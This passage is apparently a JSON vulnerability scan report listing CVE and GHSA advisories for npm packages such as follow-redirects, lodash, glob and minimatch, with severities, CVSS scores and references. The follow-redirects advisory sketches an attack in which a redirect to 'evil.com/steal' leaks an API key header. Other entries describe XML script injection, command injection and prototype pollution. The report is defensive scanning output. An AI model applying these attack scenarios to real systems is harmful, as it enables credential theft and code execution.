Inject `\u003cscript\u003e` tags into XML/SVG/HTML documents served to browsers\n2. **SOAP injection**: Modify SOAP message structure by injecting XML elements\n3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout\n4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context\n\nThis is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).\n\n## Suggested Fix\n\nEscape delimiters in comment and CDATA content:\n\n```javascript\n// For comments: replace -- with escaped equivalent\nif (key === this.options.commentPropName) {\n const safeVal = String(val).replace(/--/g, '\u0026#45;\u0026#45;');\n return this.indentate(level) + `\u003c!--${safeVal}--\u003e` + this.newLine;\n}\n\n// For CDATA: split on ]]\u003e and rejoin with separate CDATA sections\nif (key === this.options.cdataPropName) {\n const safeVal = String(val).replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e');\n return this.indentate(level) + `\u003c![CDATA[${safeVal}]]\u003e` + this.newLine;\n}\n```", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6" ] }, { "VulnerabilityID": "CVE-2026-27942", "VendorIDs": [ "GHSA-fj3w-jwp8-x2g3" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "457040697ff9b71f" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.3.8, 4.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27942", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:1d8578cae5f321b2f2f581249be445763781100492345df63a4203e451c93515", "Title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service", "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. Prior to version 5.3.8, the application crashes with stack overflow when user use XML builder with `preserveOrder:true`. Version 5.3.8 fixes the issue. As a workaround, use XML builder with `preserveOrder:false` or check the input data before passing to builder.", "Severity": "LOW", "CweIDs": [ "CWE-120" ], "VendorSeverity": { "ghsa": 1, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", "V40Score": 2.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27942", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a", "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3", "https://nvd.nist.gov/vuln/detail/CVE-2026-27942", "https://www.cve.org/CVERecord?id=CVE-2026-27942" ], "PublishedDate": "2026-02-26T02:16:22.357Z", "LastModifiedDate": "2026-03-02T14:54:48.08Z" }, { "VulnerabilityID": "GHSA-r4q5-vmmm-2653", "PkgID": "follow-redirects@1.15.11", "PkgName": "follow-redirects", "PkgIdentifier": { "PURL": "pkg:npm/follow-redirects@1.15.11", "UID": "7f24cc7faa596a4d" }, "InstalledVersion": "1.15.11", "FixedVersion": "1.16.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-r4q5-vmmm-2653", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:184ff9c48871b10e88baed7392f316651c08b3fcf01e2f78cbba175892825505", "Title": "follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets", "Description": "## Summary\n\nWhen an HTTP request follows a cross-domain redirect (301/302/307/308), `follow-redirects` only strips `authorization`, `proxy-authorization`, and `cookie` headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., `X-API-Key`, `X-Auth-Token`, `Api-Key`, `Token`) is forwarded verbatim to the redirect target.\n\nSince `follow-redirects` is the redirect-handling dependency for **axios** (105K+ stars), this vulnerability affects the entire axios ecosystem.\n\n## Affected Code\n\n`index.js`, lines 469-476:\n\n```javascript\nif (redirectUrl.protocol !== currentUrlParts.protocol \u0026\u0026\n redirectUrl.protocol !== \"https:\" ||\n redirectUrl.host !== currentHost \u0026\u0026\n !isSubdomain(redirectUrl.host, currentHost)) {\n removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers);\n}\n```\n\nThe regex only matches `authorization`, `proxy-authorization`, and `cookie`. Custom headers like `X-API-Key` are not matched.\n\n## Attack Scenario\n\n1. App uses axios with custom auth header: `headers: { 'X-API-Key': 'sk-live-secret123' }`\n2. Server returns `302 Location: https://evil.com/steal`\n3. follow-redirects sends `X-API-Key: sk-live-secret123` to `evil.com`\n4. Attacker captures the API key\n\n## Impact\n\nAny custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js.\n\n## Suggested Fix\n\nAdd a `sensitiveHeaders` option that users can extend, or strip ALL non-standard headers on cross-domain redirect.\n\n## Disclosure\n\nSource code review, manually verified. Found 2026-03-20.", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.9 } }, "References": [ "https://github.com/follow-redirects/follow-redirects", "https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9", "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653" ], "PublishedDate": "2026-04-14T01:11:11Z", "LastModifiedDate": "2026-04-14T01:11:11Z" }, { "VulnerabilityID": "CVE-2025-64756", "VendorIDs": [ "GHSA-5j98-mcp5-4vw2" ], "PkgID": "glob@10.4.5", "PkgName": "glob", "PkgIdentifier": { "PURL": "pkg:npm/glob@10.4.5", "UID": "9116516bc1102054" }, "InstalledVersion": "10.4.5", "FixedVersion": "11.1.0, 10.5.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:bb3f26fca2b8118cd4c3345e2e4b418d2caac6427b657646354bdd6deba0869a", "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", "Severity": "HIGH", "CweIDs": [ "CWE-78" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64756", "https://github.com/isaacs/node-glob", "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", "https://www.cve.org/CVERecord?id=CVE-2025-64756" ], "PublishedDate": "2025-11-17T18:15:58.27Z", "LastModifiedDate": "2025-12-02T19:34:43.27Z" }, { "VulnerabilityID": "CVE-2025-64756", "VendorIDs": [ "GHSA-5j98-mcp5-4vw2" ], "PkgID": "glob@11.0.3", "PkgName": "glob", "PkgIdentifier": { "PURL": "pkg:npm/glob@11.0.3", "UID": "fc64b08e36648e84" }, "InstalledVersion": "11.0.3", "FixedVersion": "11.1.0, 10.5.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5e5ccaee0d7775306cf535c42d67a03a1c210eab272210dacb3d72ff86eb44d6", "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", "Severity": "HIGH", "CweIDs": [ "CWE-78" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64756", "https://github.com/isaacs/node-glob", "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", "https://www.cve.org/CVERecord?id=CVE-2025-64756" ], "PublishedDate": "2025-11-17T18:15:58.27Z", "LastModifiedDate": "2025-12-02T19:34:43.27Z" }, { "VulnerabilityID": "CVE-2025-64718", "VendorIDs": [ "GHSA-mh29-5h37-fv8m" ], "PkgID": "js-yaml@3.14.1", "PkgName": "js-yaml", "PkgIdentifier": { "PURL": "pkg:npm/js-yaml@3.14.1", "UID": "7dfa3f9a3b4da359" }, "InstalledVersion": "3.14.1", "FixedVersion": "4.1.1, 3.14.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e09191a37091e8b36407e26111430486ce4a0b66f6c409dc28366e22c921c7bd", "Title": "js-yaml: js-yaml prototype pollution in merge", "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64718", "https://github.com/advisories/GHSA-mh29-5h37-fv8m", "https://github.com/nodeca/js-yaml", "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", "https://www.cve.org/CVERecord?id=CVE-2025-64718" ], "PublishedDate": "2025-11-13T16:15:57.153Z", "LastModifiedDate": "2026-02-02T12:54:45.34Z" }, { "VulnerabilityID": "CVE-2025-64718", "VendorIDs": [ "GHSA-mh29-5h37-fv8m" ], "PkgID": "js-yaml@4.1.0", "PkgName": "js-yaml", "PkgIdentifier": { "PURL": "pkg:npm/js-yaml@4.1.0", "UID": "d8116734d3e150a5" }, "InstalledVersion": "4.1.0", "FixedVersion": "4.1.1, 3.14.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:790181d288a81c9ead05601c3273757b0fbe9948b388b122dda1711ef860fb9f", "Title": "js-yaml: js-yaml prototype pollution in merge", "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-64718", "https://github.com/advisories/GHSA-mh29-5h37-fv8m", "https://github.com/nodeca/js-yaml", "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", "https://www.cve.org/CVERecord?id=CVE-2025-64718" ], "PublishedDate": "2025-11-13T16:15:57.153Z", "LastModifiedDate": "2026-02-02T12:54:45.34Z" }, { "VulnerabilityID": "CVE-2026-4800", "VendorIDs": [ "GHSA-r5fr-rjxr-66jc" ], "PkgID": "lodash@4.17.21", "PkgName": "lodash", "PkgIdentifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "3422108e237b34df" }, "InstalledVersion": "4.17.21", "FixedVersion": "4.18.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4800", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:28a01d75498ecfd8c501dddc65de6f1dc7ac7b66375f98ae8fdbb5e3665d5323", "Title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports", "Description": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.", "Severity": "HIGH", "CweIDs": [ "CWE-94" ], "VendorSeverity": { "ghsa": 3, "nvd": 4, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 8.1 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 9.8 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 8.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-4800", "https://cna.openjsf.org/security-advisories.html", "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", "https://github.com/lodash/lodash", "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", "https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc", "https://nvd.nist.gov/vuln/detail/CVE-2026-4800", "https://www.cve.org/CVERecord?id=CVE-2026-4800" ], "PublishedDate": "2026-03-31T20:16:29.66Z", "LastModifiedDate": "2026-04-07T15:43:13.197Z" }, { "VulnerabilityID": "CVE-2025-13465", "VendorIDs": [ "GHSA-xxjr-mmjv-4gpg" ], "PkgID": "lodash@4.17.21", "PkgName": "lodash", "PkgIdentifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "3422108e237b34df" }, "InstalledVersion": "4.17.21", "FixedVersion": "4.17.23", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13465", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2187f9c4938d0786655e9f0b24570e025c8f8cd37c66c7c0457566e3d986ab80", "Title": "lodash: prototype pollution in _.unset and _.omit functions", "Description": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "alma": 3, "ghsa": 2, "nvd": 2, "oracle-oval": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:P", "V3Score": 6.5, "V40Score": 6.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:2452", "https://access.redhat.com/security/cve/CVE-2025-13465", "https://bugzilla.redhat.com/2431740", "https://errata.almalinux.org/9/ALSA-2026-2452.html", "https://github.com/lodash/lodash", "https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81", "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", "https://linux.oracle.com/cve/CVE-2025-13465.html", "https://linux.oracle.com/errata/ELSA-2026-2452.html", "https://nvd.nist.gov/vuln/detail/CVE-2025-13465", "https://www.cve.org/CVERecord?id=CVE-2025-13465" ], "PublishedDate": "2026-01-21T20:16:05.25Z", "LastModifiedDate": "2026-02-17T17:10:07.52Z" }, { "VulnerabilityID": "CVE-2026-2950", "VendorIDs": [ "GHSA-f23m-r3pf-42rh" ], "PkgID": "lodash@4.17.21", "PkgName": "lodash", "PkgIdentifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "3422108e237b34df" }, "InstalledVersion": "4.17.21", "FixedVersion": "4.18.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2950", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:18611fb7f59f72fee5e79ecdce56d788b84e562c233363b40a4be1f4960b1e5b", "Title": "lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass", "Description": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "ghsa": 2, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-2950", "https://github.com/lodash/lodash", "https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh", "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", "https://nvd.nist.gov/vuln/detail/CVE-2026-2950", "https://www.cve.org/CVERecord?id=CVE-2026-2950" ], "PublishedDate": "2026-03-31T20:16:26.207Z", "LastModifiedDate": "2026-04-07T16:12:25.97Z" }, { "VulnerabilityID": "CVE-2022-21670", "VendorIDs": [ "GHSA-6vfc-qv3f-vr6c" ], "PkgID": "markdown-it@10.0.0", "PkgName": "markdown-it", "PkgIdentifier": { "PURL": "pkg:npm/markdown-it@10.0.0", "UID": "b068d65a3a75e116" }, "InstalledVersion": "10.0.0", "FixedVersion": "12.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-21670", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:f9b729292fba398ae05b02be8b1dbea418c121d1a9d9564c7a9798ca3b1e121b", "Title": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patt ...", "Description": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400", "CWE-1333" ], "VendorSeverity": { "ghsa": 2, "nvd": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "nvd": { "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V2Score": 5, "V3Score": 5.3 } }, "References": [ "https://github.com/markdown-it/markdown-it", "https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101", "https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c", "https://nvd.nist.gov/vuln/detail/CVE-2022-21670" ], "PublishedDate": "2022-01-10T21:15:07.967Z", "LastModifiedDate": "2024-11-21T06:45:11.87Z" }, { "VulnerabilityID": "CVE-2026-26996", "VendorIDs": [ "GHSA-3ppc-4f35-3m26" ], "PkgID": "minimatch@10.0.3", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "97121a07d790c0d3" }, "InstalledVersion": "10.0.3", "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c835fee8458082cd20cc6e35fdc6917199d56beaf638b5836657726c28a21414", "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "nvd": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-26996", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", "https://linux.oracle.com/cve/CVE-2026-26996.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", "https://www.cve.org/CVERecord?id=CVE-2026-26996" ], "PublishedDate": "2026-02-20T03:16:01.62Z", "LastModifiedDate": "2026-03-06T21:32:10.65Z" }, { "VulnerabilityID": "CVE-2026-27903", "VendorIDs": [ "GHSA-7r86-cg39-jmmj" ], "PkgID": "minimatch@10.0.3", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "97121a07d790c0d3" }, "InstalledVersion": "10.0.3", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8ff37ed564270d5d2a35539fcb03b21e3c99cfa7a1f18b640e501f66ade2e477", "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple 